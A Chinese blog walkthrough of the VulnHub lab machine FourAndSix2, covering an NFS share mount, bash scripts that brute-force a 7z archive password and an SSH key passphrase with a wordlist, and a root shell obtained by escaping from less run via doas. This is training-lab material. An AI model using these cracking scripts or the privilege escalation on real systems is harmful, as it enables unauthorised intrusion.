Vulnhub:fourandsix2渗透测试

测试环境

攻击IP靶机IP
192.168.179.133172.17.135.62

测试过程

老规矩,对靶机nmap一波。

nmap扫描过程截图

检测靶机运行的服务:

22端口: ssh服务
111端口: rpcbind服务
2049端口: nfs服务


简述一下nfs服务。

主要功能是通过网络让不同的机器系统之间可以彼此共享文件和目录。NFS服务器可以允许NFS客户端将远端NFS服务器端的共享目录挂载到本地的NFS客户端中。


用metasploit挂载目录。我的kali里面没有这个软件。顺便在这里介绍一下,metasploit的安装。参考链接:kali2.0 metasploit安装

  1. 安装代码:apt-get install metasploit-framework
  2. 安装完成后,启动postgresql数据库:/etc/init.d/postgresql start;或者 service
  3. postgresql start 设置开机自启:update-rc.d postgresql enable
  4. 初始化MSF数据库(关键步骤!):msfdb init 运行:msfconsole

这里nfs在metasploit的运行后命令是:use auxiliary/scanner/nfs/nfsmountmetasploit运行命令截图
发现挂载目录是/home/user/storage
用户名是user

用nfspysh(nfspysh是一个类FTP的交互式Shell,可以用来查询NFS export。它不需要使用FUSE库,因此它可以在非Linux平台上运行。)来挂载目录/home/user/storage

挂载目录截图

发现挂载目录下有一个backup.7z。在本地文件下解压。会发现需要密码来解压。
7z尝试解压截图

可以用rarcrack(安装它需要用libxml2)用枚举的方式来爆破。但是过程太久。

查资料找到一个用7z命令来爆破

创建文件7z-crack.sh

cat $2 |   #捕捉命令输入的第二个地址的文件
    while read line;  #读第二个文件(爆破文件)的每一行
        do 
            if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;  #如果 7z e $1(需要爆破的文件)解压密码是对的
                then echo "FOUND PASSWORD:"$line;  #输出正确密码,并解压。
                break;
            fi;
        done

上面的 1>/dev/null 2>/dev/null,是为了把解压密码错误时,多余的文字都输入到/dev/null,而不是输出到终端上显示。

运行命令:bash 7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt

文件爆破出后,密码是:chocolate

压缩包密码截图

解压出来后有公私钥,以及八张hellokitty。将私钥放进/root/.ssh,ssh-keygen登入172.17.135.62。需要爆破私钥密码。和上面一样写脚本爆破。
ssh-crach.sh

cat $2 | 

while read line;
	do 
		if ssh-keygen -p -P $line -N $line -f $1 1>/dev/null 2>/dev/null;
			then echo "PASSWORD FOUND : "$line;
		break;
	fi;
	done;

if判断那一步是假装ssh-keygen输入密码来判断是否正确,并输出。

运行命令是:bash ssh-crach.sh id_rsa /usr/share/wordlists/rockyou.txt

爆破密码是12345678

ssh私钥密码爆破截图

ssh user@172.17.135.62
ssh登陆成功截图

查看用户权限及系统信息
查看用户权限及系统信息截图

查看/etc/doas.conf.(openBSD的doas和Ubuntu的sudo是差不多的。)
doas.conf文件查看截图
发现允许user用户可以以root权限来运行/usr/bin/less 打开 /var/log/authlog,打开后按v。再按esc。输入:!./bin/sh。回车。获取到root权限。到/root下找到flag.txt。
渗透成功截图

总结

有些渗透技巧不看wp真的想不到,还是需要经常打。下面附上大佬的WP。

参考WP链接

MoR03r博客文章:VulnHub渗透测试FourAndSix2

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AtalantaDavis

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值